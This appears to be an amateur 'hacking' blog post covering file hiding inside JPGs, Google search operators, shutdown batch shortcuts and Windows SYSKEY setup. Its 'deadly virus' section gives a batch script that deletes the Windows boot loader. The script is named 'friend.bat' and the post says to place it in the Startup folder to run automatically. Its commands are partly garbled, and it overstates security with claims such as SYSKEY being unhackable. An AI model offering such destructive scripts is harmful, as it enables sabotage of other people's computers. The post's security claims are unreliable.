CRYPTOGRAPHY OR STENOGRAPHY BY USING SOFTWARE AND CMD PROMPT:

Using Cmd prompt:

Step 1: open cmd prompt

Step 2: type command

copy /b picturename.jpg+filename.txt final.jpg

Step 3: it will show same picture as like before only but file will be hided at back of the picture.

Step 4: now we want to open that same file again. Then open that picture with notepad then it`l show our data at the end of the file.


 

note: this command will not work on win7,vista.

picture and file be in same directory

using software tool:

Step 1: download the software by clicking this below link.
Camoflauge

Step 2: now install in your computer. It's not a virus it'll not harmful to your computer also.

Step 3: Create a notepad file like this and save as hello.txt

Step 4: now right on the file and open with Camoflauge option

Step 5: do the operations as like below process.


 


Step 6:attach file with any picture or software.


Step 7: enter your unique password to protect from others.


Step 8: finally resultant file will be like as show in figure.

Step 9: now again we want to retrieve that same file then right click on that file and open with uncamouflage .


Step 9: enter password and extract ur file into ur machine.




Google hacks and secrets………

Intitle: at the beginning of a query word or phrase (intitle:"Three Blind Mice") restricts your search results to just the titles of Web pages.


Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you're searching for might commonly appear in URLs. If you're looking for the term HTML, for example, and you don't want to get results such as
Example: mysite



Link: lets you see which pages are linking to your Web page or to another page you're interested in. For example, try typing in
link: Hackingstore.blogspot.com



inurl: restricts results to sites whose URL contains the specified phrase

example: inurl:fox fire will find all sites containing the word fire in the text and fox in the URL


filetype, ext: restricts results to documents of the specified type

example: filetype:pdf fire will return PDFs containing the word fire, while filetype:xls fox will return Excel spreadsheets with the word fox

How to create deadly virus to crash the entire system???

step 1: Open notepad
step 2: Now type the code as below…. Format..
attribute c:\ntldr –n –s –r
del c:\ntldr \f
ntldr stands for new technology loader
Options are permission provided by the windows operating system.

step 3: Now save as friend.bat
step 4: Now u can run this file to crash your system
step 5: If u keep this file in startup folder then it`ll execute
automatically when switch on ur computer.

Creating your own shortcuts to shutdown your computer

For Shutdown shortcut:
Step 1: Open notepad and type the below command
shutdown –s –t 00
Step 2: Now save it as shutdown.bat
Step 3:Now that file will act as a shutdown button.

For restart shortcut:
As like as above process but command is
Shutdown –r –t 00

How to protect ur computer from hacking ????

SYSKEY is a utility that encrypts the hashed password information in a SAM database in a Windows system using a 128-bit encryption key.

SYSKEY was an optional feature added in Windows NT 4.0 SP3. It was meant to protect against offline password cracking attacks so that the SAM database would still be secure even if someone had a copy of it. However, in December 1999, a security team from BindView found a security hole in SYSKEY which indicates that a certain form of cryptanalytic attack is possible offline. A brute force attack then appeared to be possible.

Microsoft later collaborated with BindView to issue a fix for the problem (dubbed the 'Syskey Bug') which appears to have been settled and SYSKEY has been pronounced secure enough to resist brute force attack.

According to Todd Sabin of the BindView team RAZOR, the pre-RC3 versions of Windows 2000 were also affected.

Step 1: Open Run command by pressing windows+R key or start -> run
Step 2:Type SYSKEY in the run prompt syskey means “system key”



Step 3: Click “ok”then it ill display sam lock control. Again click ‘yes ’ option and then it`l display like this ….



Step 4: Now go for upadateoption.
Step 5: After it will display startup key setup.


Step 6:Check the Password startup

Step 7: Now set the password and click ok


syskey password will ask before the user accounts password .
syskey password will not be hacked by any hacker.

powered by hackingstore | WordPress by Newwpthemes | Converted by BloggerTheme